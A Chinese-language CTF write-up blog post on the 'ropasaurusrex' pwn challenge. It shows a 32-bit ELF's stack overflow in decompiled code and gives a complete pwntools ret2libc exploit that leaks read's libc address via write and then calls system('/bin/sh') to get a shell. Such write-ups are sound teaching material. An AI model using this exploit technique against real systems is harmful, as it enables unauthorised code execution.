ropasaurusrex

32位动态链接ELF文件，no RELRO，no canary，no PIE

查看main函数

ssize_t __cdecl main()
{
  sub_80483F4();
  return write(1, "WIN\n", 4u);
}

查看sub_80483F4

ssize_t sub_80483F4()
{
  char buf[136]; // [esp+10h] [ebp-88h] BYREF

  return read(0, buf, 0x100u);
}

非常明显的栈溢出，题目中有read和write函数

因此首先先通过write函数泄露read函数的地址，然后重新运行程序，构造rop链获得shell

exp如下

from pwn import *

io = process('./ropasaurusrex')
elf = ELF('./ropasaurusrex')
libc = elf.libc
#libc = ELF('./libc.so.6')
write_plt = 0x804830C
read_got = 0x804961C
read_plt = 0x804832C
main_addr = 0x804841D
goal_addr = 0x8049700

payload = b'a' * 0x8c + p32(write_plt) + p32(main_addr)
payload += p32(1) + p32(read_got) + p32(4)
io.send(payload)
read_addr = u32(io.recv(4))
info('read_addr: 0x%x' % read_addr)
libc_base = read_addr - libc.symbols['read']
info('libc_base: 0x%x' % libc_base)
system_addr = libc_base + libc.symbols['system']
info('system_addr: 0x%x' % system_addr)
binsh_addr = libc_base + next(libc.search(b'/bin/sh'))
info('binsh_addr: 0x%x' % binsh_addr)

payload = b'a' * 0x8c + p32(system_addr) + p32(main_addr) + p32(binsh_addr)
io.send(payload)

io.interactive()

posted @ 2021-08-28 22:37 hktk1643 阅读(71) 评论(0) 编辑收藏举报

会员力量，点亮园子希望

刷新页面返回顶部

hktk1643

ropasaurusrex

公告